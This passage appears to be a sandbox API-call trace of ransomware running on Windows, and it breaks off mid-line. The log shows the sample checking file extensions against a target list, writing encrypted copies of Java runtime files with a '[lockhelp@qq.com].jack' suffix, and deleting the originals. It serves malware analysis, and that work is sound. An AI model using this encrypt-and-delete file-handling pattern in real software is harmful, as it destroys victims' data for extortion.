(lpString=".doc") returned 4 [0201.457] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0201.457] lstrlenW (lpString=".docx") returned 5 [0201.457] lstrcmpiW (lpString1=".docx", lpString2="b.dat") returned -1 [0201.457] lstrlenW (lpString=".pdf") returned 4 [0201.457] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0201.457] lstrlenW (lpString=".xls") returned 4 [0201.457] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0201.457] lstrlenW (lpString=".xlsx") returned 5 [0201.457] lstrcmpiW (lpString1=".xlsx", lpString2="b.dat") returned -1 [0201.457] lstrlenW (lpString=".ppt") returned 4 [0201.457] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0201.457] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0201.457] lstrlenW (lpString=".zip") returned 4 [0201.457] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0201.457] lstrlenW (lpString=".rar") returned 4 [0201.457] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0201.457] lstrlenW (lpString=".bz2") returned 4 [0201.458] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0201.458] lstrlenW (lpString=".7z") returned 3 [0201.458] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0201.458] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0201.458] lstrlenW (lpString=".dbf") returned 4 [0201.458] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0201.458] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0201.458] lstrlenW (lpString=".1cd") returned 4 [0201.458] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0201.458] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0201.458] lstrlenW (lpString=".jpg") returned 4 [0201.458] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0201.458] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0201.458] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0201.458] lstrlenW (lpString=".doc") returned 4 [0201.458] lstrcmpiW (lpString1=".doc", lpString2=".dat") returned 1 [0201.458] lstrlenW (lpString=".docx") returned 5 [0201.458] lstrcmpiW (lpString1=".docx", lpString2="b.dat") returned -1 [0201.458] lstrlenW (lpString=".pdf") returned 4 [0201.458] lstrcmpiW (lpString1=".pdf", lpString2=".dat") returned 1 [0201.458] lstrlenW (lpString=".xls") returned 4 [0201.458] lstrcmpiW (lpString1=".xls", lpString2=".dat") returned 1 [0201.458] lstrlenW (lpString=".xlsx") returned 5 [0201.458] lstrcmpiW (lpString1=".xlsx", lpString2="b.dat") returned -1 [0201.458] lstrlenW (lpString=".ppt") returned 4 [0201.458] lstrcmpiW (lpString1=".ppt", lpString2=".dat") returned 1 [0201.458] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0201.458] lstrlenW (lpString=".zip") returned 4 [0201.458] lstrcmpiW (lpString1=".zip", lpString2=".dat") returned 1 [0201.459] lstrlenW (lpString=".rar") returned 4 [0201.459] lstrcmpiW (lpString1=".rar", lpString2=".dat") returned 1 [0201.459] lstrlenW (lpString=".bz2") returned 4 [0201.459] lstrcmpiW (lpString1=".bz2", lpString2=".dat") returned -1 [0201.459] lstrlenW (lpString=".7z") returned 3 [0201.459] lstrcmpiW (lpString1=".7z", lpString2="dat") returned -1 [0201.459] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0201.459] lstrlenW (lpString=".dbf") returned 4 [0201.459] lstrcmpiW (lpString1=".dbf", lpString2=".dat") returned 1 [0201.459] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0201.459] lstrlenW (lpString=".1cd") returned 4 [0201.459] lstrcmpiW (lpString1=".1cd", lpString2=".dat") returned -1 [0201.459] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\lib\\tzdb.dat") returned 47 [0201.459] lstrlenW (lpString=".jpg") returned 4 [0201.459] lstrcmpiW (lpString1=".jpg", lpString2=".dat") returned 1 [0201.459] lstrcmpiW (lpString1=".txt", lpString2=".jack") returned 1 [0201.459] lstrlenW (lpString="README.txt") returned 10 [0201.459] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0201.460] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=46) returned 1 [0201.460] CloseHandle (hObject=0x420) returned 1 [0201.460] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt")) returned 0x20 [0201.460] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.460] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0201.461] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.461] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.461] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0201.461] GetLastError () returned 0x0 [0201.461] ReadFile (in: hFile=0x420, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x2e, lpOverlapped=0x0) returned 1 [0201.462] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x30, lpOverlapped=0x0) returned 1 [0201.463] ReadFile (in: hFile=0x420, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.463] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xe8, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xe8, lpOverlapped=0x0) returned 1 [0201.463] SetEndOfFile (hFile=0x404) returned 1 [0201.464] CloseHandle (hObject=0x404) returned 1 [0201.465] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.465] SetEndOfFile (hFile=0x420) returned 1 [0201.466] CloseHandle (hObject=0x420) returned 1 [0201.466] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0201.466] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\readme.txt")) returned 1 [0201.467] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0201.467] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0201.467] lstrlenW (lpString=".doc") returned 4 [0201.467] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0201.467] lstrlenW (lpString=".docx") returned 5 [0201.467] lstrcmpiW (lpString1=".docx", lpString2="E.txt") returned -1 [0201.467] lstrlenW (lpString=".pdf") returned 4 [0201.467] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0201.467] lstrlenW (lpString=".xls") returned 4 [0201.467] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0201.467] lstrlenW (lpString=".xlsx") returned 5 [0201.467] lstrcmpiW (lpString1=".xlsx", lpString2="E.txt") returned -1 [0201.467] lstrlenW (lpString=".ppt") returned 4 [0201.467] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0201.467] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0201.467] lstrlenW (lpString=".zip") returned 4 [0201.467] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0201.467] lstrlenW (lpString=".rar") returned 4 [0201.467] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0201.467] lstrlenW (lpString=".bz2") returned 4 [0201.467] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0201.468] lstrlenW (lpString=".7z") returned 3 [0201.468] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0201.468] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0201.468] lstrlenW (lpString=".dbf") returned 4 [0201.468] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0201.468] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0201.468] lstrlenW (lpString=".1cd") returned 4 [0201.468] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0201.468] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0201.468] lstrlenW (lpString=".jpg") returned 4 [0201.468] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0201.468] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0201.468] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0201.468] lstrlenW (lpString=".doc") returned 4 [0201.468] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0201.468] lstrlenW (lpString=".docx") returned 5 [0201.468] lstrcmpiW (lpString1=".docx", lpString2="E.txt") returned -1 [0201.468] lstrlenW (lpString=".pdf") returned 4 [0201.468] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0201.468] lstrlenW (lpString=".xls") returned 4 [0201.468] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0201.468] lstrlenW (lpString=".xlsx") returned 5 [0201.468] lstrcmpiW (lpString1=".xlsx", lpString2="E.txt") returned -1 [0201.468] lstrlenW (lpString=".ppt") returned 4 [0201.468] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0201.468] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0201.468] lstrlenW (lpString=".zip") returned 4 [0201.469] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0201.469] lstrlenW (lpString=".rar") returned 4 [0201.469] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0201.469] lstrlenW (lpString=".bz2") returned 4 [0201.469] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0201.469] lstrlenW (lpString=".7z") returned 3 [0201.469] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0201.469] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0201.469] lstrlenW (lpString=".dbf") returned 4 [0201.469] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0201.469] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0201.469] lstrlenW (lpString=".1cd") returned 4 [0201.469] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0201.469] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\README.txt") returned 45 [0201.469] lstrlenW (lpString=".jpg") returned 4 [0201.469] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0201.470] lstrcmpiW (lpString1=".txt", lpString2=".jack") returned 1 [0201.470] lstrlenW (lpString="THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 34 [0201.470] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0201.470] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=63933) returned 1 [0201.470] CloseHandle (hObject=0x420) returned 1 [0201.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt")) returned 0x20 [0201.470] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.470] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0201.470] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.471] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.471] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0201.471] GetLastError () returned 0x0 [0201.471] ReadFile (in: hFile=0x420, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0xf9bd, lpOverlapped=0x0) returned 1 [0201.495] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0xf9c0, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0xf9c0, lpOverlapped=0x0) returned 1 [0201.497] ReadFile (in: hFile=0x420, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.497] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x118, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x118, lpOverlapped=0x0) returned 1 [0201.497] SetEndOfFile (hFile=0x404) returned 1 [0201.497] CloseHandle (hObject=0x404) returned 1 [0201.499] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.499] SetEndOfFile (hFile=0x420) returned 1 [0201.501] CloseHandle (hObject=0x420) returned 1 [0201.501] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0201.501] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme-javafx.txt")) returned 1 [0201.501] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0201.501] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0201.501] lstrlenW (lpString=".doc") returned 4 [0201.501] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0201.501] lstrlenW (lpString=".docx") returned 5 [0201.501] lstrcmpiW (lpString1=".docx", lpString2="X.txt") returned -1 [0201.502] lstrlenW (lpString=".pdf") returned 4 [0201.502] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0201.502] lstrlenW (lpString=".xls") returned 4 [0201.502] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0201.502] lstrlenW (lpString=".xlsx") returned 5 [0201.502] lstrcmpiW (lpString1=".xlsx", lpString2="X.txt") returned -1 [0201.502] lstrlenW (lpString=".ppt") returned 4 [0201.502] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0201.502] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0201.502] lstrlenW (lpString=".zip") returned 4 [0201.502] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0201.502] lstrlenW (lpString=".rar") returned 4 [0201.502] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0201.502] lstrlenW (lpString=".bz2") returned 4 [0201.502] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0201.502] lstrlenW (lpString=".7z") returned 3 [0201.502] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0201.502] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0201.502] lstrlenW (lpString=".dbf") returned 4 [0201.502] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0201.502] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0201.502] lstrlenW (lpString=".1cd") returned 4 [0201.502] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0201.502] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0201.502] lstrlenW (lpString=".jpg") returned 4 [0201.502] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0201.503] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0201.503] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0201.503] lstrlenW (lpString=".doc") returned 4 [0201.503] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0201.503] lstrlenW (lpString=".docx") returned 5 [0201.503] lstrcmpiW (lpString1=".docx", lpString2="X.txt") returned -1 [0201.503] lstrlenW (lpString=".pdf") returned 4 [0201.503] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0201.503] lstrlenW (lpString=".xls") returned 4 [0201.503] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0201.503] lstrlenW (lpString=".xlsx") returned 5 [0201.503] lstrcmpiW (lpString1=".xlsx", lpString2="X.txt") returned -1 [0201.503] lstrlenW (lpString=".ppt") returned 4 [0201.503] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0201.503] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0201.503] lstrlenW (lpString=".zip") returned 4 [0201.503] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0201.503] lstrlenW (lpString=".rar") returned 4 [0201.503] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0201.503] lstrlenW (lpString=".bz2") returned 4 [0201.503] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0201.503] lstrlenW (lpString=".7z") returned 3 [0201.503] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0201.503] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0201.503] lstrlenW (lpString=".dbf") returned 4 [0201.503] lstrcmpiW (lpString1=".dbf", lpString2=".txt") returned -1 [0201.503] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0201.503] lstrlenW (lpString=".1cd") returned 4 [0201.504] lstrcmpiW (lpString1=".1cd", lpString2=".txt") returned -1 [0201.504] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME-JAVAFX.txt") returned 69 [0201.504] lstrlenW (lpString=".jpg") returned 4 [0201.504] lstrcmpiW (lpString1=".jpg", lpString2=".txt") returned -1 [0201.504] lstrcmpiW (lpString1=".txt", lpString2=".jack") returned 1 [0201.504] lstrlenW (lpString="THIRDPARTYLICENSEREADME.txt") returned 27 [0201.504] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0201.504] GetFileSizeEx (in: hFile=0x420, lpFileSize=0x3a5ff14 | out: lpFileSize=0x3a5ff14*=145180) returned 1 [0201.504] CloseHandle (hObject=0x420) returned 1 [0201.504] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt")) returned 0x20 [0201.505] GetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt.id-b4197730.[lockhelp@qq.com].jack")) returned 0xffffffff [0201.505] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x420 [0201.505] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.505] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.505] CreateFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt.id-B4197730.[lockhelp@qq.com].jack" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt.id-b4197730.[lockhelp@qq.com].jack"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x404 [0201.505] GetLastError () returned 0x0 [0201.505] ReadFile (in: hFile=0x420, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x2371c, lpOverlapped=0x0) returned 1 [0201.674] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x23720, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x23720, lpOverlapped=0x0) returned 1 [0201.676] ReadFile (in: hFile=0x420, lpBuffer=0x4555020, nNumberOfBytesToRead=0xffff0, lpNumberOfBytesRead=0x3a5fecc, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesRead=0x3a5fecc*=0x0, lpOverlapped=0x0) returned 1 [0201.676] WriteFile (in: hFile=0x404, lpBuffer=0x4555020*, nNumberOfBytesToWrite=0x10a, lpNumberOfBytesWritten=0x3a5fc94, lpOverlapped=0x0 | out: lpBuffer=0x4555020*, lpNumberOfBytesWritten=0x3a5fc94*=0x10a, lpOverlapped=0x0) returned 1 [0201.676] SetEndOfFile (hFile=0x404) returned 1 [0201.676] CloseHandle (hObject=0x404) returned 1 [0201.679] SetFilePointerEx (in: hFile=0x420, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x3a5fec0 | out: lpNewFilePointer=0x0) returned 1 [0201.679] SetEndOfFile (hFile=0x420) returned 1 [0201.680] CloseHandle (hObject=0x420) returned 1 [0201.680] SetFileAttributesW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt.id-B4197730.[lockhelp@qq.com].jack", dwFileAttributes=0x20) returned 1 [0201.681] DeleteFileW (lpFileName="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt" (normalized: "c:\\program files\\java\\jre1.8.0_144\\thirdpartylicensereadme.txt")) returned 1 [0201.681] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0201.681] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0201.681] lstrlenW (lpString=".doc") returned 4 [0201.681] lstrcmpiW (lpString1=".doc", lpString2=".txt") returned -1 [0201.681] lstrlenW (lpString=".docx") returned 5 [0201.681] lstrcmpiW (lpString1=".docx", lpString2="E.txt") returned -1 [0201.681] lstrlenW (lpString=".pdf") returned 4 [0201.681] lstrcmpiW (lpString1=".pdf", lpString2=".txt") returned -1 [0201.681] lstrlenW (lpString=".xls") returned 4 [0201.681] lstrcmpiW (lpString1=".xls", lpString2=".txt") returned 1 [0201.681] lstrlenW (lpString=".xlsx") returned 5 [0201.681] lstrcmpiW (lpString1=".xlsx", lpString2="E.txt") returned -1 [0201.681] lstrlenW (lpString=".ppt") returned 4 [0201.681] lstrcmpiW (lpString1=".ppt", lpString2=".txt") returned -1 [0201.681] lstrlenW (lpString="C:\\Program Files\\Java\\jre1.8.0_144\\THIRDPARTYLICENSEREADME.txt") returned 62 [0201.681] lstrlenW (lpString=".zip") returned 4 [0201.681] lstrcmpiW (lpString1=".zip", lpString2=".txt") returned 1 [0201.681] lstrlenW (lpString=".rar") returned 4 [0201.681] lstrcmpiW (lpString1=".rar", lpString2=".txt") returned -1 [0201.681] lstrlenW (lpString=".bz2") returned 4 [0201.681] lstrcmpiW (lpString1=".bz2", lpString2=".txt") returned -1 [0201.681] lstrlenW (lpString=".7z") returned 3 [0201.682] lstrcmpiW (lpString1=".7z", lpString2="txt") returned -1 [0201.682] lstrlenW (lpString="C:\\Program 